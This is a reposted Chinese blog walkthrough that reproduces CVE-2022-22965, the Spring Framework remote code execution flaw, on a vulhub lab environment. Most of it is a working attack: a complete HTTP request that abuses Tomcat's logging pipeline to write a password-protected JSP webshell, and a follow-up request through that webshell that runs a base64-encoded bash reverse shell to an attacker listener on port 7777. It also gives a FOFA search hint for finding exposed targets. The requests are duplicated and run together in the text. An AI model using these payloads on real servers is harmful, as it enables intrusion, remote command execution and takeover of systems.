本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现 CVE-2022-22965 Spring Framework RCE
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE应用程序开发提供了一个好用的框架。2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。Spring MVC 框架的参数绑定功能提供了将请求中的参数绑定控制器方法中参数对象的成员变量,通过 ClassLoader构造恶意请求获取AccessLogValue 对象并注入恶意字段值,来更改 Tomcat 服务器的日志记录属性触发 pipeline 机制写入任意路径下的文件。
![图片[1]-CVE-2022-22965 Spring Framework RCE-安全小天地](https://img.godyu.com/2023/12/20231226124801436.png?imageView2/0/format/webp/q/75)
0x03 漏洞复现
漏洞影响: Spring Framework < 5.2.20、Spring Framework < 5.3.18
FOFA:Spring Framework
1.开启CVE-2022-22965 vulhub环境
https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965docker-compose up -dhttps://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965 docker-compose up -dhttps://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965 docker-compose up -d
![图片[2]-CVE-2022-22965 Spring Framework RCE-安全小天地](https://img.godyu.com/2023/12/20231226204802900.png?imageView2/0/format/webp/q/75)
2.构造payload,写入名称为tomcatwar.jsp的webshell到tomcat的webapps/ROOT路径下
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1Host: x.x.x.x:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closesuffix: %>//c1: Runtimec2: <%DNT: 1GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 Host: x.x.x.x:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close suffix: %>// c1: Runtime c2: <% DNT: 1GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 Host: x.x.x.x:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close suffix: %>// c1: Runtime c2: <% DNT: 1
![图片[3]-CVE-2022-22965 Spring Framework RCE-安全小天地](https://img.godyu.com/2023/12/20231226204804239.png?imageView2/0/format/webp/q/75)
3.反弹shell,构造base64解码反弹shell脚本,可以用如下网站(由于是get方法,需要转换为url编码http://www.jsons.cn/urlencode)
https://ir0ny.top/pentest/reverse-encoder-shell.htmlhttps://ir0ny.top/pentest/reverse-encoder-shell.htmlhttps://ir0ny.top/pentest/reverse-encoder-shell.html
![图片[4]-CVE-2022-22965 Spring Framework RCE-安全小天地](https://img.godyu.com/2023/12/20231226204805701.png?imageView2/0/format/webp/q/75)
4.nc监听7777端口,并反弹shell,得到一个shell
GET /tomcatwar.jsp?pwd=j&cmd=bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjMxLjcwLzc3NzcgMD4mMQ%3D%3D%7D%7C%7Bbasedsao4%2C-d%7D%7C%7Bbash%2C-i%7D HTTP/1.1Host: x.x.x.x:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closesuffix: %>//c1: Runtimec2: <%DNT: 1GET /tomcatwar.jsp?pwd=j&cmd=bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjMxLjcwLzc3NzcgMD4mMQ%3D%3D%7D%7C%7Bbasedsao4%2C-d%7D%7C%7Bbash%2C-i%7D HTTP/1.1 Host: x.x.x.x:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close suffix: %>// c1: Runtime c2: <% DNT: 1GET /tomcatwar.jsp?pwd=j&cmd=bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjMxLjcwLzc3NzcgMD4mMQ%3D%3D%7D%7C%7Bbasedsao4%2C-d%7D%7C%7Bbash%2C-i%7D HTTP/1.1 Host: x.x.x.x:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close suffix: %>// c1: Runtime c2: <% DNT: 1
![图片[5]-CVE-2022-22965 Spring Framework RCE-安全小天地](https://img.godyu.com/2023/12/20231226204806939.png?imageView2/0/format/webp/q/75)
THE END
暂无评论内容